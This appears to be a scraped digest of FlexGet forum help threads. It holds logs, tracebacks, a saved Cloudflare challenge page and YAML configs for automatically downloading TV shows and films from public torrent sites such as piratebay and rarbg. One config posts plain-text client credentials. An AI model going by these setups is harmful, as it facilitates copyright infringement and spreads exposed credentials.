2019-03-02 09:26 VERBOSE  details       tv              Summary - Accepted: 0 (Rejected: 2 Undecided: 4 Failed: 0)
2019-03-02 09:26 INFO     task          tv              Rerunning the task in case better resolution can be achieved.
2019-03-02 09:26 VERBOSE  discover      tv              Discovering 1 titles ...
2019-03-02 09:26 INFO     discover      tv              Ignoring interval because of --discover-now
2019-03-02 09:26 VERBOSE  backlog.db    tv              Added 2 entries from backlog
2019-03-02 09:26 VERBOSE  details       tv              Produced 2 entries.
2019-03-02 09:26 VERBOSE  task          tv              REJECTED: `The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb[rartv]` by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?)
2019-03-02 09:26 VERBOSE  task          tv              REJECTED: `The.Orville.S02E09.720p.WEB.x264-TBS[rartv]` by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL)
2019-03-02 09:26 VERBOSE  details       tv              Summary - Accepted: 0 (Rejected: 2 Undecided: 0 Failed: 0)
2019-03-02 09:32 VERBOSE  task_queue                    There are 1 tasks to execute. Shutdown will commence when they have completed.
2019-03-02 09:32 VERBOSE  discover      tv              Discovering 2 titles ...
2019-03-02 09:32 INFO     discover      tv              Ignoring interval because of --discover-now
2019-03-02 09:32 INFO     task          tv              Plugin next_series_episodes has requested task to be ran again after execution has completed. Reason: Look for next season
2019-03-02 09:32 VERBOSE  discover      tv              moonshiners S08E11 hasn't been released yet (Expected: 2019-03-06 00:00:00)
2019-03-02 09:32 VERBOSE  discover      tv              Searching for `the orville S02E09` with plugin `rarbg` (1 of 1)
2019-03-02 09:32 VERBOSE  discover      tv              Searching for `the orville S02E09` with plugin `piratebay` (1 of 1)
2019-03-02 09:32 VERBOSE  discover      tv              Searching for `the orville S02E09` with plugin `limetorrents` (1 of 1)
2019-03-02 09:32 VERBOSE  details       tv              Produced 31 entries.
2019-03-02 09:32 VERBOSE  task          tv              REJECTED: `The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb[rartv]` by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?)
2019-03-02 09:32 VERBOSE  task          tv              REJECTED: `The.Orville.S02E09.720p.WEB.x264-TBS[rartv]` by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL)
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The.Orville.S02E09.1080p.WEB.x264-TBS[rartv]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The.Orville.S02E09.Identity.Part.2.1080p.AMZN.WEBRip.DDP5.1.x264-NTb[rartv]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The.Orville.S02E09.WEB.x264-TBS[rartv]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The.Orville.S02E09.WEBRip.x264-ION10`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The.Orville.S02E09.1080p.WEB.x264-TBS[TGx]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 1080P WEB-DL DD5 1 H 264`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 1080p WEB x264-TBS`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 1080p WEB x264 TBS[rarbg]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 Identity Part 2 1080p Webrip x265 EAC3 5 1 Goki [SEV]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 1080p WEB x264 TBS[TGx]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 WEB x264 TBS[eztv]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 XviD AFG[TGx]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 WEB x264 TBS[rarbg]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 WEB x264 TBS[ettv]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 480p x264 mSD[eztv]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 WEB x264 TBS[TGx]`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 1080P WEB DL DD5 1 H 264`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  flexget.components.series.series tv              Ignored `The Orville S02E09 WEB DL XviD B4ND1T69`. Does not meet quality requirement `720p webrip+`.
2019-03-02 09:32 VERBOSE  task          tv              ACCEPTED: `The.Orville.S02E09.720p.WEB.x264-TBS[TGx]` by series plugin because matches quality
2019-03-02 09:32 INFO     urlrewriter   tv              Entry 'The.Orville.S02E09.720p.WEB.x264-TBS[TGx]' URL rewritten to magnet:?xt=urn:btih:f0a559f6dcf3189de6c108a65663d5a20f5b258c&dn=The.Orville.S02E09.720p.WEB.x264-TBS%5BTGx%5D&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Fzer0day.ch%3A1337&tr=udp%3A%2F%2Fopen.demonii.com%3A1337&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fexodus.desync.com%3A6969 (with piratebay)
2019-03-02 09:32 INFO     remember_rej  tv              Remembering rejection of `The.Orville.S02E09.720p.WEB.x264-TBS[TGx]`
2019-03-02 09:32 VERBOSE  task          tv              REJECTED: `The.Orville.S02E09.720p.WEB.x264-TBS[TGx]` by magnets plugin because magnet urls not allowed.
2019-03-02 09:32 VERBOSE  details       tv              Summary - Accepted: 0 (Rejected: 3 Undecided: 28 Failed: 0)
2019-03-02 09:32 INFO     task          tv              Rerunning the task in case better resolution can be achieved.
2019-03-02 09:32 VERBOSE  discover      tv              Discovering 1 titles ...
2019-03-02 09:32 INFO     discover      tv              Ignoring interval because of --discover-now
2019-03-02 09:32 VERBOSE  backlog.db    tv              Added 2 entries from backlog
2019-03-02 09:32 VERBOSE  details       tv              Produced 2 entries.
2019-03-02 09:32 VERBOSE  task          tv              REJECTED: `The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb[rartv]` by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?, Unexpected html content received from `magnet:?xt=urn:btih:c5531d87b6c222697bd10d65d1e3c0614a3f191b&dn=The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb%5Brartv%5D&tr=http%3A%2F%2Ftracker.trackerfix.com%3A80%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710&tr=udp%3A%2F%2F9.rarbg.to%3A2710&tr=udp%3A%2F%2Fopen.demonii.com%3A1337%2Fannounce` - maybe a login page?)
2019-03-02 09:32 VERBOSE  task          tv              REJECTED: `The.Orville.S02E09.720p.WEB.x264-TBS[rartv]` by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL)
2019-03-02 09:32 VERBOSE  details       tv              Summary - Accepted: 0 (Rejected: 2 Undecided: 0 Failed: 0)

Here is the content from the received error file:

The.Orville.S02E09.Identity.Part.2.720p.AMZN.WEBRip.DDP5.1.x264-NTb[rartv].error

<!DOCTYPE HTML>
<html lang="en-US">
<head>
  <meta charset="UTF-8" />
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
  <meta name="robots" content="noindex, nofollow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>Just a moment...</title>
  <style type="text/css">
    html, body {width: 100%; height: 100%; margin: 0; padding: 0;}
    body {background-color: #ffffff; font-family: Helvetica, Arial, sans-serif; font-size: 100%;}
    h1 {font-size: 1.5em; color: #404040; text-align: center;}
    p {font-size: 1em; color: #404040; text-align: center; margin: 10px 0 0 0;}
    #spinner {margin: 0 auto 30px auto; display: block;}
    .attribution {margin-top: 20px;}
    @-webkit-keyframes bubbles { 33%: { -webkit-transform: translateY(10px); transform: translateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: translateY(-10px); } 100% { -webkit-transform: translateY(0); transform: translateY(0); } }
    @keyframes bubbles { 33%: { -webkit-transform: translateY(10px); transform: translateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: translateY(-10px); } 100% { -webkit-transform: translateY(0); transform: translateY(0); } }
    .bubbles { background-color: #404040; width:15px; height: 15px; margin:2px; border-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ease-in-out; animation:bubbles 0.6s 0.07s infinite ease-in-out; -webkit-animation-fill-mode:both; animation-fill-mode:both; display:inline-block; }
  </style>

    <script type="text/javascript">
  //<![CDATA[
  (function(){
    var a = function() {try{return !!window.addEventListener} catch(e) {return !1} },
    b = function(b, c) {a() ? document.addEventListener("DOMContentLoaded", b, c) : document.attachEvent("onreadystatechange", b)};
    b(function(){
      var a = document.getElementById('cf-content');a.style.display = 'block';
      setTimeout(function(){
        var s,t,o,p,b,r,e,a,k,i,n,g,f, HtnRdKD={"sooxlI":+((!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+[])+(+[])+(!+[]+!![]+!![])+(!+[]+!![]+!![]+!![])+(!+[]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]))/+((!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![])+(!+[]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]))};
        t = document.createElement('div');
        t.innerHTML="<a href='/'>x</a>";
        t = t.firstChild.href;r = t.match(/https?:\/\//)[0];
        t = t.substr(r.length); t = t.substr(0,t.length-1);
        a = document.getElementById('jschl-answer');
        f = document.getElementById('challenge-form');
        ;HtnRdKD.sooxlI-=+((!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+[])+(!+[]+!![]+!![]+!![])+(+!![])+(!+[]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![])+(+!![]))/+((!+[]+!![]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![])+(!+[]+!![])+(!+[]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]));HtnRdKD.sooxlI-=+((!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]+!![])+(+!![])+(+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!![]))/+((!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]+!![]+!![])+(+!![])+(+[])+(!+[]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+!![])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]));a.value = +HtnRdKD.sooxlI.toFixed(10) + t.length; '; 121'
        f.action += location.hash;
        f.submit();
      }, 4000);
    }, false);
  })();
  //]]>
</script>


</head>
<body>
  <table width="100%" height="100%" cellpadding="20">
    <tr>
      <td align="center" valign="middle">
          <div class="cf-browser-verification cf-im-under-attack">
  <noscript><h1 data-translate="turn_on_js" style="color:#bd2426;">Please turn JavaScript on and reload the page.</h1></noscript>
  <div id="cf-content" style="display:none">
    
    <div>
      <div class="bubbles"></div>
      <div class="bubbles"></div>
      <div class="bubbles"></div>
    </div>
    <h1><span data-translate="checking_browser">Checking your browser before accessing</span> itorrents.org.</h1>
    
    <p data-translate="process_is_automatic">This process is automatic. Your browser will redirect to your requested content shortly.</p>
    <p data-translate="allow_5_secs">Please allow up to 5 seconds&hellip;</p>
  </div>
   
  <form id="challenge-form" action="/cdn-cgi/l/chk_jschl" method="get">
    <input type="hidden" name="s" value="c48257a5b65c541f65e3475df9997dec3d68b263-1551535081-1800-AR1U/r6pljou5BghZULX4DU1jpUK8YSVLFKUetlaGkxzxyOBzltJsUddXqtspfTm12HpXze8zBjPhclw6Vv35KheEfPEWPbyE5gcp930iXFU"></input>
    <input type="hidden" name="jschl_vc" value="6dc43cdb5d60530e95ace24ad87e3997"/>
    <input type="hidden" name="pass" value="1551535085.698-x/mmolkZ44"/>
    <input type="hidden" id="jschl-answer" name="jschl_answer"/>
  </form>
</div>

          
          <div class="attribution">
            <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=iuam" target="_blank" style="font-size: 12px;">DDoS protection by Cloudflare</a>
            <br>
            Ray ID: 4b13e2149bf3c186
          </div>
      </td>
     
    </tr>
  </table>
</body>
</html>

I have magnets set to no.

Fexget used to work for me. I had a config with the shows listed in it and it worked fine. I tried to make a config using Trakt for the shows and that's when the problem started. Flexget was able to view the list from Trakt but the the entries failed. Now, the old script receives the same error.I am trying to go very basic to eliminate some things but it is not working. How do I get around this? Any help is greatly appreciated.

Posts: 1

Participants: 1

Read full topic

Unhandled error in plugin

$
0
0

@Amishman wrote:

I modified the "Lazy Couch" script by ZileXa to fit my needs. It downloads movies and TV shows but I am receiving different crash error messages. I'm not sure if it is something I have set wrong or if they are bugs.

My Config: https://pastebin.com/UvjMGY58

Full log: https://drive.google.com/open?id=1dj_wpphmuAXQ_uP8u2vGnWSPb1J2XAi1

Error number 1 happened twice.

Error 1
Full crash log: https://pastebin.com/CTRGTbec

2019-03-10 13:00 CRITICAL task          download-series-discover BUG: Unhandled error in plugin discover: list index out of range
Traceback (most recent call last):
  File "c:\python27\lib\site-packages\flexget\task.py", line 522, in __run_plugin
    return method(*args, **kwargs)
  File "c:\python27\lib\site-packages\flexget\event.py", line 23, in __call__
    return self.func(*args, **kwargs)
  File "c:\python27\lib\site-packages\flexget\plugins\input\discover.py", line 293, in on_task_input
    return self.execute_searches(config, entries, task)
  File "c:\python27\lib\site-packages\flexget\plugins\input\discover.py", line 135, in execute_searches
    search_results = search.search(task=task, entry=entry, config=plugin_config)
  File "c:\python27\lib\site-packages\flexget\plugin.py", line 126, in wrapped_func
    return func(*args, **kwargs)
  File "c:\python27\lib\site-packages\flexget\components\sites\sites\argenteam.py", line 99, in search
    e['argenteam_subtitle'] = release['subtitles'][0]['uri']
IndexError: list index out of range

Error 2
Full crash log: https://pastebin.com/gjnc2Y8T

2019-03-10 13:12 CRITICAL task          download-movies-NQ-discover BUG: Unhandled error in plugin utorrent: 400 Client Error: ERROR for url: http://localhost:18182/gui/?action=add-url&download_dir=1&s=magnet%3A%3Fxt%3Durn%3Abtih%3A91fe962b5f87ec9079edd6aca443dc96473ddc74%26dn%3Dbulletproof.1996.1080p.bluray.x264.ac3-etrg%26tr%3Dudp%253a%252f%252f9.rarbg.to%253a2710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.opentrackr.org%253a1337%252fannounce%26tr%3Dudp%253a%252f%252ftracker.leechers-paradise.org%253a69692710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.blackunicorn.xyz%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.sktorrent.net%253a69692710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.glotorrents.com%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.coppersurfer.tk%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.aletorrenty.pl%253a2710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.openbittorrent.com%253a80%252fannounce%26tr%3Dudp%253a%252f%252ftracker.leechers-paradise.org%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.internetwarriors.net%253a1337%252fannounce%26tr%3Dudp%253a%252f%252f9.rarbg.me%253a2710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.coppersurfer.tk%253a69692710%252fannounce%26tr%3Dudp%253a%252f%252feddie4.nl%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.zer0day.to%253a1337%252fannounce%26tr%3Dudp%253a%252f%252ftracker.leechers-paradise.org%253a6969%252fannounce%26tr%3Dudp%253a%252f%252fcoppersurfer.tk%253a6969%252fannounce&token=uXlRXTEL_8yrUvjsxMpTLfbG0rf1Fib50T7blpGbiO8BkYzJRgRVAGpFhVwAAAAA&path=
Traceback (most recent call last):
  File "c:\python27\lib\site-packages\flexget\task.py", line 522, in __run_plugin
    return method(*args, **kwargs)
  File "c:\python27\lib\site-packages\flexget\event.py", line 23, in __call__
    return self.func(*args, **kwargs)
  File "c:\python27\lib\site-packages\flexget\plugins\output\utorrent.py", line 154, in on_task_output
    result = session.get(url, params=data, auth=auth)
  File "c:\python27\lib\site-packages\requests\sessions.py", line 546, in get
    return self.request('GET', url, **kwargs)
  File "c:\python27\lib\site-packages\flexget\utils\requests.py", line 259, in request
    result.raise_for_status()
  File "c:\python27\lib\site-packages\requests\models.py", line 940, in raise_for_status
    raise HTTPError(http_error_msg, response=self)
HTTPError: 400 Client Error: ERROR for url: http://localhost:18182/gui/?action=add-url&download_dir=1&s=magnet%3A%3Fxt%3Durn%3Abtih%3A91fe962b5f87ec9079edd6aca443dc96473ddc74%26dn%3Dbulletproof.1996.1080p.bluray.x264.ac3-etrg%26tr%3Dudp%253a%252f%252f9.rarbg.to%253a2710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.opentrackr.org%253a1337%252fannounce%26tr%3Dudp%253a%252f%252ftracker.leechers-paradise.org%253a69692710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.blackunicorn.xyz%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.sktorrent.net%253a69692710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.glotorrents.com%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.coppersurfer.tk%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.aletorrenty.pl%253a2710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.openbittorrent.com%253a80%252fannounce%26tr%3Dudp%253a%252f%252ftracker.leechers-paradise.org%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.internetwarriors.net%253a1337%252fannounce%26tr%3Dudp%253a%252f%252f9.rarbg.me%253a2710%252fannounce%26tr%3Dudp%253a%252f%252ftracker.coppersurfer.tk%253a69692710%252fannounce%26tr%3Dudp%253a%252f%252feddie4.nl%253a6969%252fannounce%26tr%3Dudp%253a%252f%252ftracker.zer0day.to%253a1337%252fannounce%26tr%3Dudp%253a%252f%252ftracker.leechers-paradise.org%253a6969%252fannounce%26tr%3Dudp%253a%252f%252fcoppersurfer.tk%253a6969%252fannounce&token=uXlRXTEL_8yrUvjsxMpTLfbG0rf1Fib50T7blpGbiO8BkYzJRgRVAGpFhVwAAAAA&path=

Posts: 1

Participants: 1

Read full topic

How to prevent series partial name match

$
0
0

@therealmatey wrote:

I'm finding that having House (M.D.) as a show in my thetvdb.com list that Flexget will also download House of Lies and House of Cards. I looked at using regexp: reject with these two names, but it still downloads those shows.

Is there a way to block those shows from being matched to the single word name of House?

templates:
hdtv:
configure_series:
settings:
quality: 1080p|720p hdtv+ !10bit
upgrade: yes
identified_by: ep
tracking: backfill
from:
thetvdb_list:
username: *****
account_id: **********
api_key: ********
strip_dates: yes

tasks:
hdtv-shows:
template: hdtv
discover:
what:
- next_series_episodes:
from_start: yes
backfill: yes
from:
- search_rss: http://eztv.io/ezrss.xml
- rarbg:
category: HDTV
use_tvdb: True
- 1337x: Yes
regexp:
reject:
- house of cards
- house of lies
torrent_alive: yes
deluge: yes

Posts: 3

Participants: 2

Read full topic

Is it possible to use more advanced notify messages via Slack using Block Kit Builder?

$
0
0

@Nemesis7 wrote:

Is it possible to define a Slack message template that allows me to make more complex messages in the Block Kit Builder format? I'm noticing that attachments are not sufficient.

Also if not possible, if I were to make my own Slack notify/message plugin, what do I have to consider?

Posts: 1

Participants: 1

Read full topic

Parse a complete html file

$
0
0

@Tarrasque wrote:

Hi all.

I need to get entries from a web site which unfortunaly is VERY VERY badly made.

Urls and titles are nowhere close enough to be processed by any of the usual plugins. Plus, the HTMismarmad in various places (unclosed tags and such) so even a XML parser is nearly useless.

The only way I found so far to extract any meaningful info from those pages is writing a python script that using BeautifulSoup and CSS class queries. I am able to reconstruct title / url pairs.

So, what I'm asking is: is there a plugin that allows me to feed a whole page in a custom script and pass the output to the rest of the Flexget task to process?

Posts: 1

Participants: 1

Read full topic


Why am I getting a RequestException Error getting mock?

$
0
0

@Nemesis7 wrote:

I get a RequestException Error getting mock://localhost/movie_list/3120: <urlopen error unknown url type: mock>, while downloading mock://localhost/movie_list/3120

I run flexget get in a venv, tried python 3.6.5 and 3.7.2. What am I doing wrong?

Posts: 2

Participants: 1

Read full topic

Update trakt.tv Collected when torrent complete

$
0
0

@rcnorth wrote:

I am using the Trakt.tv collected flag to know if a TV episode has been retrieved or not, if it is not Flexget finds the torrent and adds it to Transmission.

I was using the Plex plugin to update the Collected flag, but the plugin doesn't appear to be working and often doesn't update the collected flag.

To get around the plex plugin problem I was hoping to be able to use Transmission to see if the torrent is complete. Is there any way to associate a Transmission torrent with a TVDB ID to be able to get its status (downloading/seeding)?

If Transmission can't do this does another torrent client support it?

From my review of the documentation it would appear that neither Transmission nor Deluge can do this, but I'm hoping that someone smarter than me can prove me wrong.

Thanks

Posts: 1

Participants: 1

Read full topic

([Errno 1] Operation not permitted:

$
0
0

@marine88 wrote:

Hi there cant move my downloaded files. User have permissions to move files but im still geting this errors before i don´t have it but now im using virtualenv in my instalation. Here is my log!

Posts: 1

Participants: 1

Read full topic

By retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL)

$
0
0

@1265578519 wrote:

2019-04-27 14:12 VERBOSE task naichawu REJECTED: 【喵萌奶茶屋】★10月新番★[哥布林杀手/Goblin Slayer][01-12END][720p][简体][招募翻译校对] by retry_failed plugin because waiting before retrying entry which has failed in the past. (failure reason: Magnet URL)

naichawu:
rss: https://share.dmhy.org/topics/rss/rss.xml?keyword=&sort_id=31&team_id=669&order=date-desc
accept_all: yes
download: /home/transmission/torrent
limit_new: 50
free_space:
space: 40000
content_size:
min: 10
max: 500000
strict: no
magnets: yes
transmission:
host: localhost
port: 9091
path: /data/www1
username: itzmx.com
password: itzmx.com
disable: details

Posts: 1

Participants: 1

Read full topic

1080p version from RSS missed by FlexGet but viewable in browser

$
0
0

@Paul_Littlefield wrote:

I have added this to my config...

series:
hdtv <720p:
- A Discovery of Witches
720p:
- Absentia
1080p:
- Game of Thrones:
from_group:
- MEMENTO

I have checked my RRS feed from ShowRSS in a web browser and the 1080p magnet link for GoT is there...

<item>
